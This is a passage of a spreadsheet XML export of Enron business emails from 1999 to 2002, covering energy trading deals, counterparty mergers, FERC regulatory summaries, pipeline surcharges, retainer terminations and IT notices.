Landau/NA/Enron@ENRON, Diana Andel/CAL/ECT@ECT, Sylvia A Campos/HOU/ECT@ECT _x000D_
Subject: merging of Koch Energy Trading and Entergy Power Marketing_x000D_
_x000D_
Please let me know if someone in SAP is already working with EOL on this and, _x000D_
if so, the status._x000D_
_x000D_
Thank you,_x000D_
Karen_x000D_
x3-0605_x000D_
_x000D_
---------------------- Forwarded by Karen Lambert/HOU/ECT on 01/18/2001 01:39 _x000D_
PM ---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  EOLHelp                                                             _x000D_
01/18/2001 01:25 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
Sent by: Mary Griff Gray_x000D_
To: Karen Lambert/HOU/ECT@ECT, Walter Guidroz/NA/Enron@Enron_x000D_
cc: Tom Moran/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, EOL Call Center _x000D_
Subject: merging of Koch Energy Trading and Entergy Power Marketing_x000D_
_x000D_
heads up_x000D_
_x000D_
Effective February 1, 2001, Koch Energy Trading and Entergy Power Marketing _x000D_
will be merging.  The new name will be Axia Energy Trading.  I have left a _x000D_
voice mail for Karen to call the customer with details of what Enron requires _x000D_
to accomplish this change in our systems.  I also conferenced Vikkie Karel _x000D_
(Koch Energy  -- 713-544-5269) with Walter for clarification of the parties _x000D_
that are merging._x000D_
_x000D_
Regarding EOL users from both companies, is there a way that the customer can _x000D_
keep IDs/filters/etc. and move to the new name? OR, will new IDs need to be _x000D_
created?  ===== this is for you, Stephanie_x000D_
_x000D_
Griff_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 21 Jul 2000 04:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: H.Q. Energy Services (U.S.) Inc. ISDA Master</t>
  </si>
  <si>
    <t xml:space="preserve">Tana:  look in lotus notes.  I think you should contact Russell for Canada _x000D_
(since Rod is gone).  Cyntia Pastega is the business person.  SS_x000D_
_x000D_
_x000D_
_x000D_
	Tana Jones_x000D_
	07/14/2000 02:27 PM_x000D_
		 _x000D_
		 To: William S Bradford/HOU/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Nidia _x000D_
Mendoza/HOU/ECT@ECT, Tanya Rohauer/HOU/ECT@ECT, Brant Reves/HOU/ECT@ECT, Rod _x000D_
Nelson/LON/ECT@ECT, Tracy Ngo/HOU/ECT@ECT, John Suttle/HOU/ECT@ECT, Lesli _x000D_
Campbell/HOU/ECT@ECT, Molly Harris/HOU/ECT@ECT, Veronica _x000D_
Espinoza/Corp/Enron@ENRON, Paul Radous/Corp/Enron@ENRON, Wendi _x000D_
LeBrocq/Corp/Enron@Enron, Brad Schneider/Corp/Enron@Enron, Brent _x000D_
Hendry/NA/Enron@Enron, Sara Shackleton/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, _x000D_
Susan Flynn/HOU/ECT@ECT, Carol St Clair/HOU/ECT@ECT, Susan _x000D_
Bailey/HOU/ECT@ECT, Mary Cook/HOU/ECT@ECT, Samantha Boyd/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: H.Q. Energy Services (U.S.) Inc. ISDA Master_x000D_
_x000D_
Hydro Quebec has forwarded to us their form of ISDA Schedule for the _x000D_
referenced counterparty for review.  There is no indication of what Enron _x000D_
business person is interested in this counterparty.  I will forward a copy of _x000D_
the ISDA to Mr. "Canada" Suttle, and open a Lotus Notes entry with the _x000D_
contact information.  We won't do anything until we receive a credit _x000D_
worksheet from Credit._x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 08:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Meter 0980438 - Acock Production ??????</t>
  </si>
  <si>
    <t xml:space="preserve">Vance:_x000D_
_x000D_
When will the new deal, or deal # 380710 be made retroactive in Path _x000D_
Manager?  The close deadline for Expense contracts is Wednesday October 25th._x000D_
_x000D_
Fred_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mary Poorman@ENRON_x000D_
10/24/2000 02:17 PM_x000D_
To: Vance L Taylor/HOU/ECT@ECT_x000D_
cc: Fred Boas/HOU/ECT@ECT, Nick Moshou/Corp/Enron@ENRON, Cynthia _x000D_
Hakemack/HOU/ECT@ECT, Kristen J Hanson/HOU/ECT@ECT, Daren J _x000D_
Farmer/HOU/ECT@ECT, Pat Clynes/Corp/Enron@ENRON, Robert Cotten/HOU/ECT@ECT, _x000D_
Tom Acton/Corp/Enron@ENRON, Jackie Morgan/HOU/ECT@ECT _x000D_
Subject: Re: Meter 0980438 - Acock Production ??????  _x000D_
_x000D_
I have spoken with Clem, this meter is now "non-allocatable", not unlike _x000D_
meter 8751on Big Cowboy.  This meter needs to be set up as a Receipt Meter _x000D_
attached to the Gulf Energy 27-009-08 agreement.  This gas began flowing on _x000D_
7/7/00, so deal ticket 380710, which begins 9/1/00 will need to be backed up _x000D_
to July to account for the purchase of this production._x000D_
_x000D_
Bob:  Please email me when the deal ticket is complete so that I can have _x000D_
Fred set up accounting arrangements on Gulf Energy._x000D_
_x000D_
Fred:  Can you please determine whether or not we have paid CCGM for this gas?_x000D_
_x000D_
Once again, thank you all for your assistance._x000D_
_x000D_
Mary_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 13:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve"> Enron Recruitment Technology is launching a new, easy to use, web-based=20_x000D_
Employee Referral Program._x000D_
_x000D_
 This new site will help you to help Enron find the talent it needs.=20_x000D_
Referrals are one of the best sources of talent for Enron in terms of quali=_x000D_
ty=20_x000D_
and fit with Enron's culture. We have found that referrals stay with the=20_x000D_
company longer and adapt faster than those hired through other sources. Thi=_x000D_
s=20_x000D_
site will help us run a world-class employee referral program with less wor=_x000D_
k=20_x000D_
and better results.=20_x000D_
_x000D_
 There are also incentives for you. If you refer a candidate who is hired,=_x000D_
=20_x000D_
you could be eligible to receive a cash reward of up to $5,000._x000D_
_x000D_
 So help someone accelerate their career, make yourself some money, and hel=_x000D_
p=20_x000D_
us realize our mission of being the World's No. 1 Company._x000D_
_x000D_
 Check out the site - http://enron.referrals.com/promo.asp - let us know wh=_x000D_
at=20_x000D_
you think -- we want to hear from you. This application should make referri=_x000D_
ng=20_x000D_
easier for you so if you have suggestions that would enhance the program,=_x000D_
=20_x000D_
send us an e-mail (Referral.Station@enron.com) or contact the Referral=20_x000D_
Station at (713) 345-3254, option 2._x000D_
_x000D_
 David Oxley_x000D_
_x000D_
=01;</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 08:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'susan.landwehr@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>Association list for conference call</t>
  </si>
  <si>
    <t xml:space="preserve">Please find attached list of Association memberships to be discussed._x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 13:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Max Holmes - Day #4</t>
  </si>
  <si>
    <t>Richard, attached is a report on today's session of the deposition of Max _x000D_
Holmes.? Steve _x000D_
? _x000D_
_x000D_
 &lt;&lt;depsum11.30&gt;&gt; _x000D_
_x000D_
This e-mail message may contain legally privileged and/or confidential _x000D_
information. If you are not the intended recipient(s), or the employee _x000D_
or agent responsible for delivery of this message to the intended _x000D_
recipient(s), you are hereby notified that any dissemination, _x000D_
distribution or copying of this e-mail message is strictly prohibited. _x000D_
If you have received this message in error, please immediately notify _x000D_
the sender and delete this e-mail message from your computer. _x000D_
_x000D_
_x000D_
 - depsum11.30</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 05:03:46 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'a..smith@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'lynn.blair@enron.com', 'helpdesk.hottap@enron.com', 'toby.kuehl@enron.com', 'john.buchanan@enron.com', 'sheila.nacey@enron.com', 'bradley.holmes@enron.com', 'darrell.schoolcraft@enron.com', 'terry.kowalke@enron.com'})</t>
  </si>
  <si>
    <t>All tests were NOT successfully executed</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
All testing was completed this morning.  Through the web access, all systems tested successfully.  However, we've had numerous calls indicating that the TMS application cannot be accessed through the Start-Programs method.  _x000D_
_x000D_
We contacted the ENW Resolution Center at 6:20 a.m. and were told that there had been a problem with the cluster last night.  They asked us to assure that everyone had logged off last night, and we did.  People reporting problems accessing the application through the start menu are advised how to access it from the web.  We have had a problem in the past where security rights are lost to the ETSTMS folder when there have been problems with the cluster.  A critical ticket has been opened, and the ENW Information Risk Management group has been paged.  We will keep you apprised of our progress._x000D_
_x000D_
Chris Smith_x000D_
33270_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 07:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Western Resources</t>
  </si>
  <si>
    <t xml:space="preserve">David _x000D_
_x000D_
Could you work with Joe Wagner on this.  thanks_x000D_
_x000D_
----- Forwarded by Elizabeth Sager/HOU/ECT on 12/20/2000 03:41 PM -----_x000D_
_x000D_
	Janice R Moore_x000D_
	12/20/2000 03:37 PM_x000D_
		 _x000D_
		 To: Elizabeth Sager/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Western Resources_x000D_
_x000D_
Further to my voicemail -- this is the deal to cover Laura Podurgiel's short _x000D_
for cal 01._x000D_
Regards,_x000D_
Janice_x000D_
_x000D_
EB3861_x000D_
Assistant General Counsel, Enron North America Corp._x000D_
713-853-1794 (Fax:  713-646-4842)_x000D_
----- Forwarded by Janice R Moore/HOU/ECT on 12/20/2000 03:36 PM -----_x000D_
_x000D_
	Joseph Wagner@ENRON_x000D_
	12/20/2000 03:10 PM_x000D_
		 _x000D_
		 To: Janice R Moore/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Western Resources_x000D_
_x000D_
Janice,_x000D_
_x000D_
Another high priority deal.  The attached proposal is for Western Resources _x000D_
in order to cover a short position we have in SPP.  Noone will sell us FLD so _x000D_
we are agreeing to a system firm deal with one catch.  Western Resources will _x000D_
put in reserve 20-25% of the total deal value in an account.  They will then _x000D_
reimburse us  up to the amount in reserve, if they cut us.  I have tried to _x000D_
lay out as muck detail in the attachment as possible.  This deal would need _x000D_
to be closed by Jan 1.  Let me know if we need to meet on this and I will get _x000D_
someone from the desk to come along.  I will call you to follow up on this.  _x000D_
Thanks._x000D_
_x000D_
-Joe_x000D_
_x000D_
  _x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Dec 2001 13:27:03 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dave.neubauer@enron.com'})</t>
  </si>
  <si>
    <t>2001 Accomplishments</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dan,_x000D_
_x000D_
The attached sheet contains a summary of 2001 accomplishments.  If you need additional details let me know. </t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 14:29:45 -0800 (PST)</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;READ! UBS EMAIL MIGRATION&lt;&lt;&lt;&lt;</t>
  </si>
  <si>
    <t>This message is only relevant for those going to UBS._x000D_
_x000D_
When exporting your EMAIL messages listed in the instructions or via the Outlook Export utility, attachments WILL NOT BE SAVED!_x000D_
There will be a better solution to exporting your Email messages and all your attachments emailed later today._x000D_
_x000D_
Thank you,_x000D_
John Oh</t>
  </si>
  <si>
    <t>Wed, 15 Dec 1999 00:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kimberly.olinger@enron.com'})</t>
  </si>
  <si>
    <t>A Reminder -- 2000 GRI Surcharges</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Randall L Gay/HOU/ECT on 12/15/99 08:53 _x000D_
AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Rebecca W Cantrell                           12/14/99 05:07 PM_x000D_
	_x000D_
_x000D_
To: Julie A Gomez/HOU/ECT@ECT, Chris Meyer/HOU/ECT@ECT, Ruth _x000D_
Concannon/HOU/ECT@ECT, Judy Townsend/HOU/ECT@ECT, Theresa _x000D_
Branney/HOU/ECT@ECT, Paul T Lucci/DEN/ECT@Enron, Jane M Tholt/HOU/ECT@ECT, _x000D_
Mike Grigsby/HOU/ECT@ECT, Steven P South/HOU/ECT@ECT, Frank _x000D_
Ermis/HOU/ECT@ECT, Susan W Pereira/HOU/ECT@ECT, George Smith/HOU/ECT@ECT, _x000D_
Randall L Gay/HOU/ECT@ECT, Jim Homco/HOU/ECT@ECT, Colleen _x000D_
Sullivan/HOU/ECT@ECT, Hunter S Shively/HOU/ECT@ECT, Cary M _x000D_
Carrabine/HOU/ECT@ECT, Ray Hamman/HOU/EES@EES, Katherine L Kelly/HOU/ECT@ECT, _x000D_
Robert Superty/HOU/ECT@ECT, Laura Luce/HOU/ECT@ECT, Steve Morse/HOU/ECT@ECT, _x000D_
Scotty Gilbert/HOU/ECT@ECT, Cary M Carrabine/HOU/ECT@ECT, Edward _x000D_
Terry/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT, Robert Shiring/HOU/ECT@ECT, Tori _x000D_
Kuykendall/HOU/ECT@ECT, Mary Solmonson/HOU/ECT@ECT, Barend _x000D_
VanderHorst/HOU/EES@EES, Brenda H Fletcher/HOU/ECT@ECT, Jeff _x000D_
Coates/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: A Reminder -- 2000 GRI Surcharges_x000D_
_x000D_
Effective 1/1/00............_x000D_
_x000D_
---------------------- Forwarded by Rebecca W Cantrell/HOU/ECT on 12/14/99 _x000D_
05:03 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Rebecca W Cantrell                           11/10/99 05:39 PM_x000D_
	_x000D_
_x000D_
To: Julie A Gomez/HOU/ECT@ECT, Chris Meyer/HOU/ECT@ECT, Ruth _x000D_
Concannon/HOU/ECT@ECT, Judy Townsend/HOU/ECT@ECT, Theresa _x000D_
Branney/HOU/ECT@ECT, Paul T Lucci/DEN/ECT@Enron, Jane M Tholt/HOU/ECT@ECT, _x000D_
Mike Grigsby/HOU/ECT@ECT, Steven P South/HOU/ECT@ECT, Frank _x000D_
Ermis/HOU/ECT@ECT, Susan W Pereira/HOU/ECT@ECT, George Smith/HOU/ECT@ECT, _x000D_
Randall L Gay/HOU/ECT@ECT, Jim Homco/HOU/ECT@ECT, Colleen _x000D_
Sullivan/HOU/ECT@ECT, Hunter S Shively/HOU/ECT@ECT, Cary M _x000D_
Carrabine/HOU/ECT@ECT, Ray Hamman/HOU/EES@EES, Michael H Garred/HOU/EES@EES, _x000D_
Katherine L Kelly/HOU/ECT@ECT, Robert Superty/HOU/ECT@ECT, Laura _x000D_
Luce/HOU/ECT@ECT, Steve Morse/HOU/ECT@ECT, Scotty Gilbert/HOU/ECT@ECT, Cary M _x000D_
Carrabine/HOU/ECT@ECT, Edward Terry/HOU/ECT@ECT, Scott Neal/HOU/ECT@ECT, _x000D_
Robert Shiring/HOU/ECT@ECT, Tori Kuykendall/HOU/ECT@ECT, Mary _x000D_
Solmonson/HOU/ECT@ECT, Terri Walker/OTS/Enron@ENRON_x000D_
cc:  _x000D_
Subject: 2000 GRI Surcharges_x000D_
_x000D_
Just a reminder that the GRI surcharges will go down for all member pipelines _x000D_
a bit effective 1/1/99, per the Settlement approved by FERC in April, 1998.  _x000D_
Here are the rates through 2004:_x000D_
_x000D_
Rates (cents per Dth)	_x000D_
	1999	_x000D_
		2000	_x000D_
			2001	_x000D_
				2001	_x000D_
					2003	_x000D_
						2004_x000D_
Commodity	0.75	0.72	0.7	0.5	0.4	0.0_x000D_
High Demand*	23.0	20.0	9.0	6.0	5.0	0.0_x000D_
Low Demand*	14.2	12.3	5.5	3.7	3.1	0.0_x000D_
Small Customer	1.8	1.6	1.1	0.8	0.6	0.0_x000D_
  						_x000D_
*refers to high load factor or low load factor customers._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 11:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mike.e.kelly@enron.com', 'alan.comnes@enron.com', 'patrick.hanse@enron.com', 'ozzie.pagan@enron.com', 'kcompea@enron.com', 'jeff.king@enron.com', 'steve.walton@enron.com', 'rogers.herndon@enron.com', 'robert.benson@enron.com', 'sharon.hausinger@enron.com', 'dave.mangskau@enron.com', 'tom.chapman@enron.com', 'karla.compean@enron.com', 'chris.booth@enron.com', 'tom.hoatson@enron.com', 'donna.fulton@enron.com', 'fletcher.sturm@enron.com', 'sarah.novosel@enron.com', 'steven.krimsky@enron.com', 'ebaughm@enron.com', 'andy.rodriquez@enron.com', 'dan.staines@enron.com', 'dave.kellermeyer@enron.com', 'greg.krause@enron.com', 'mary.hain@enron.com', 'terri.clynes@enron.com', 'heather.kroll@enron.com', 'oscar.dalton@enron.com', 'ron.tapscott@enron.com', 'lloyd.will@enron.com', 'steve.montovano@enron.com', 'jeff.williams@enron.com', 'michelle.zhang@enron.com', 'susan.mara@enron.com', 'thane.twiggs@enron.com', 'rusty.stevens@enron.com', 'aleck.dadson@enron.com', 'jeff.brown@enron.com', 'geroge.mccormick@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com', 'matt.lorenz@enron.com', 'russell.ballato@enron.com', 'joe.connor@enron.com', 'ron.mcnamara@enron.com', 'david.fairley@enron.com', 'bill.rust@ernon.com', 'gary.justice@enron.com', 'janine.migden@enron.com', 'jason.choate@enron.com', 'jeffrey.keenan@enron.com', 'mike.roan@enron.com', 'peter.makkai@enron.com', 'howard.fromer@enron.com', 'shelley.corman@enron.com', 'mathew.gimble@enron.com', 'rebecca.walker@enron.com', 'daniel.allegretti@enron.com', 'raimund.grube@enron.com', 'john.forney@enron.com', 'steve.wang@enron.com', 'ben.jacoby@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'maria.valdes@enron.com', 'joseph.wagner@enron.com', 'james.steffes@enron.com', 'john.moore@enron.com', 'rick.whitaker@enron.com', 'w.duran@enron.com', 'wjennin@enron.com', 'fred.mitro@enron.com', 'elizabeth.johnston@enron.com', 'jean.ryall@enron.com', 'kerry.stroup@enron.com', 'joe.hartsoe@enron.com', 'ray.hoppe@enron.com', 'kevin.presto@enron.com', 'doug.sewell@enron.com'})</t>
  </si>
  <si>
    <t>FERC order denying SPP/Entergy RTO -Summary</t>
  </si>
  <si>
    <t xml:space="preserve">FERC Order Issued 3/28/01 Rejecting SPP/Entergy=01,s RTO=20_x000D_
_x000D_
 The Commissioners were generally displeased by SPP and Entergy=01,s lack o=_x000D_
f=20_x000D_
substantive work toward complying with the Commission=01,s previous orders =_x000D_
and=20_x000D_
failure to sufficiently discuss the feasibility of a broader RTO.  As Chair=_x000D_
=20_x000D_
Herbert said:  SPP should have read the Commission=01,s order in May and ta=_x000D_
ken=20_x000D_
it more seriously.  (Issues for possible rehearing are ****)._x000D_
_x000D_
? The Commission declined to approve SPP=01,s scope and configuration becau=_x000D_
se=20_x000D_
the SPP members remain uncommitted to the RTO and have not made a decision =_x000D_
to=20_x000D_
transfer operational control and the SPP/Entergy relationship remains=20_x000D_
somewhat undefined.  The Commission wants to see evidence of serious effort=_x000D_
s=20_x000D_
to form RTOs that combine current RTO proposals and Entergy and SPP must fi=_x000D_
le=20_x000D_
a report by May 25 addressing this scope issue._x000D_
_x000D_
 o Bulk power sales and purchase figures indicate that natural markets exte=_x000D_
nd=20_x000D_
beyond the SPP RTO borders.  There are significant sales and purchases=20_x000D_
between SPP and SERC (and Midwest companies to a lesser extent.)_x000D_
 o Expect the existing TOs to file Section 203 applications to transfer=20_x000D_
control of transmission to SPP._x000D_
 o MOU must be clarified to demonstrate that the minimum requirements of an=_x000D_
=20_x000D_
RTO, such as operational authority, ATC calculation and planning/expansion,=_x000D_
=20_x000D_
will be met._x000D_
_x000D_
? Approves Entergy=01,s proposal for a Managing Member that controls all vo=_x000D_
ting=20_x000D_
rights to the Transco and approves Entergy=01,s Board approval process (sta=_x000D_
tes=20_x000D_
that Entergy would control no more than two of the selection committee=01,s=_x000D_
=20_x000D_
seven members).=20_x000D_
_x000D_
? Allows Southwestern Public Service Company to satisfy its merger obligati=_x000D_
on=20_x000D_
by joining SPP instead of MISO._x000D_
_x000D_
? The Commission did not address EPMI=01,s motion to condition market based=_x000D_
 rate=20_x000D_
authority on RTO participation.******_x000D_
</t>
  </si>
  <si>
    <t>Mon, 10 Sep 2001 08:23:52 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'annabel.houx@gs.com'})</t>
  </si>
  <si>
    <t>FW: Transfer and Assignment of Enron North America Corp. ("ENA")_x000D_
 accounts to Enron Credit Inc. ("ECI")</t>
  </si>
  <si>
    <t>Annabel:_x000D_
_x000D_
I sent a fax to you regarding the assignment referenced in the attached email on February 2, 2001 and May 30, 2001.  I never received a response from you.  _x000D_
_x000D_
Please put me in touch with the appropriate person for resolving this assignment issue.  Thank you for your attention to this matter._x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shackleton, Sara  _x000D_
Sent:	Monday, September 10, 2001 10:18 AM_x000D_
To:	'pamela.coleman@gs.com'_x000D_
Cc:	'nikki.kroll@gs.com'; Glover, Sheila; Doukas, Tom; Panus, Stephanie_x000D_
Subject:	Transfer and Assignment of Enron North America Corp. ("ENA") accounts to Enron Credit Inc. ("ECI")_x000D_
_x000D_
Pamela:_x000D_
_x000D_
On May 22, 2001, I sent an email to you regarding the aforementioned account assignment.  I also copied Nikki Kroll on that email.  ENA and ECI are anxious to have this assignment executed but we have not had any response.  I am reattaching a copy of the assignment for your convenience.  I will need your assistance in identifying the ECI account with Goldman, Sachs &amp; Co. ("GS").  Stephanie Panus sent Nikki Kroll the ECI account documentation via overnight delivery on May 18, 2001._x000D_
_x000D_
Please direct your attention to the following:_x000D_
_x000D_
(1)  Please execute and return to ECI an original Corporate Account Agreement with GS.  Also, please provide ECI with the account number._x000D_
_x000D_
(2)  Please review the attached Assignment and Assumption Agreement and advise if we can execute and forward to GS for execution._x000D_
_x000D_
Your prompt attention to this matter is greatly appreciated._x000D_
_x000D_
 _x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490</t>
  </si>
  <si>
    <t>Tue, 18 Dec 2001 16:36:45 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 12/18/01; HourAhead hour: 15;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 12/18/01; HourAhead hour: 15;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2001121815.txt</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 06:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Thoughts for re-org</t>
  </si>
  <si>
    <t xml:space="preserve">Vince and Stinson,_x000D_
_x000D_
I have some thoughts on the re-org for the group. _x000D_
_x000D_
As far as the valuation as concerned,  I think we should not divide ourselves _x000D_
by_x000D_
commodity.  Simulating power prices is not too much different from simulating _x000D_
gas _x000D_
prices, and so is the options pricing.  Actually there is some synergy to _x000D_
share_x000D_
some common techniques that are specific to each market. _x000D_
_x000D_
 So I propose that Stinson runs a "bigger" valuation group that  includes the_x000D_
power-related deals pricing.   In terms of personnel, Alex, Tom, and Lance_x000D_
could be a valuable addition to the valuation term._x000D_
_x000D_
Let me know if my thoughts are too far off._x000D_
_x000D_
_x000D_
Zimin_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 11:06:28 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Government Affairs Retainer Agreements</t>
  </si>
  <si>
    <t>Why don't you respond._x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Alvarez, Ray =20_x000D_
Sent:=09Monday, November 26, 2001 1:00 PM_x000D_
To:=09Shapiro, Richard_x000D_
Cc:=09Robertson, Linda; Novosel, Sarah_x000D_
Subject:=09RE: Government Affairs Retainer Agreements_x000D_
_x000D_
Rick, I had Legal (Steve Hall) look over the document and he was ok with it=_x000D_
 and thought it was quite a good deal.  I will try to get it finalized this=_x000D_
 afternoon.  The other significant CA items are Seabron Adamson's estimates=_x000D_
; the first one was $25k and the second totals $167k (through issue 1).  Sh=_x000D_
ould I try to pin him down and cap the second estimate?  We have pending in=_x000D_
voices from him for $25k (relating to the first estimate) and $82k and $5k =_x000D_
relating to the second.  Ray =20_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Shapiro, Richard =20_x000D_
Sent:=09Monday, November 26, 2001 10:10 AM_x000D_
To:=09Alvarez, Ray_x000D_
Cc:=09Robertson, Linda; Novosel, Sarah_x000D_
Subject:=09RE: Government Affairs Retainer Agreements_x000D_
_x000D_
Yes..Let's finalize asap. Thanks._x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Alvarez, Ray =20_x000D_
Sent:=09Monday, November 26, 2001 9:09 AM_x000D_
To:=09Shapiro, Richard_x000D_
Cc:=09Robertson, Linda; Novosel, Sarah_x000D_
Subject:=09RE: Government Affairs Retainer Agreements_x000D_
_x000D_
Rick, please advise if I should proceed with finalizing the $200k fixed fee=_x000D_
 arrangement with Bracewell to carry us through the end of the CA proceedin=_x000D_
g.  (FYI we have an approximately $90k invoice pending that should be cover=_x000D_
ed within the arrangement).  Thanks.  Ray_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Dernehl, Ginger   On Behalf Of Shapiro, Richard_x000D_
Sent:=09Wednesday, November 21, 2001 9:58 AM_x000D_
To:=09Alamo, Joseph; Allegretti, Daniel; Allen, Joe; Alvarez, Ray; Ausenhus=_x000D_
, Kara; Barnes, Lynnette; Bellas, Kirsten; Bestard, Jose; Binns, Darran; Bo=_x000D_
lton, Scott; Boston, Roy; Buerger, Rubena; Burns, Stephen; Canovas, Guiller=_x000D_
mo; Cantrell, Rebecca W.; Comnes, Alan; Connor, Joe; Cooney, Carolyn; Dasov=_x000D_
ich, Jeff; Decker, Larry; Dernehl, Ginger; Dressler, Jean; Floris, Vinio; F=_x000D_
rank, Robert; Fromer, Howard; Fulton, Donna; Gottfredson, Bryan; Guerrero, =_x000D_
Janel; Hamilton, Allison; Hardy Jr, John; Hartfield, Rita; Hawkins, Bernade=_x000D_
tte; Hemstock, Robert; Hetrick, Nancy; Hoatson, Tom; Hueter, Barbara A.; Hu=_x000D_
nter, Bevin; Huson, Maggy; Ibrahim, Amr; Kaufman, Paul; Kean, Steven J.; Ke=_x000D_
ene, Patrick; Kingerski, Harry; Kishigami, Kikumi; Knight, Laurie; Landwehr=_x000D_
, Susan M.; Lassere, Donald; Lawner, Leslie; Lawrence, Linda L.; Leibman, L=_x000D_
ara; Leonardo, Samuel; Levy, Alberto; Lindberg, Susan; Linnell, Elizabeth; =_x000D_
Long, Chris; Mara, Susan; Maurer, Luiz; McVicker, Maureen; Migden, Janine; =_x000D_
Miller, Terri; Montovano, Steve; Moore, Bill; Nersesian, Carin; Neustaedter=_x000D_
, Robert; Nicolay, Christi L.; Nord, Sue; Noske, Linda J.; Novosel, Sarah; =_x000D_
O'connell, Earlene; Ogenyi, Gloria; Palmer, Germain; Perez, Carmen; Perez, =_x000D_
Gus; Perrino, Dave; Petrochko, Mona L.; Pharms, Melinda; Reyna, Margo; Rish=_x000D_
e, Frank; Rizzo, Helen; Roan, Michael; Robertson, Linda; Robinson, Marchris=_x000D_
; Rodriquez, Andy; Ryall, Jean; Shapiro, Richard; Shelk, John; Shortridge, =_x000D_
Pat; Staines, Dan; Steffes, James D.; Stephens, Sharonda; Stransky, Joan; S=_x000D_
troup, Kerry; Stubbings, Randy; Sullivan, Kathleen; Sullivan, Lora; Thome, =_x000D_
Jennifer; Tiberi, Fino; Twiggs, Thane; Walton, Steve; Warner, Geriann; Yeun=_x000D_
g, Charles; Yoho, Lisa_x000D_
Subject:=09Government Affairs Retainer Agreements_x000D_
_x000D_
_x000D_
Please send out Notices of Termination by November 30, 2001 for all retaine=_x000D_
r (fixed payments) agreements (lobbying, legal, consulting, etc...)  We nee=_x000D_
d to end all payments as of December 31, 2001.  Thank you very much._x000D_
_x000D_
_x000D_
_x000D_
Ginger Dernehl_x000D_
Administrative Coordinator_x000D_
Global Government Affairs_x000D_
Phone# 713-853-7751_x000D_
Fax# 713-646-8160</t>
  </si>
  <si>
    <t>Wed, 3 Jan 2001 10:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Additional Materials</t>
  </si>
  <si>
    <t xml:space="preserve">It's hard to disagree with the fact that 1) the utilities are the ones that _x000D_
cut the deal they're living with and 2) they took all of the "stranded cost" _x000D_
money that consumers paid them and invested it in other states and _x000D_
countries.  _x000D_
_x000D_
But you can only buy for 10 cents and sell for 5 cents for so long before _x000D_
creditors turn off the spigot.  Difficult to see how the spigot stays on with _x000D_
the draft decision issued today.  (See story attached, below.)  _x000D_
_x000D_
With bankruptcy, the only one making any decisions is the judge, and while _x000D_
some see benefits to that, seems to us that from a political, financial and _x000D_
commercial perspective, bankruptcy creates many more problems than it solves._x000D_
_x000D_
That said, we're extremely sensitive to the politics of rate increases.  But _x000D_
if the increases are subject to refund, then decision makers can buy _x000D_
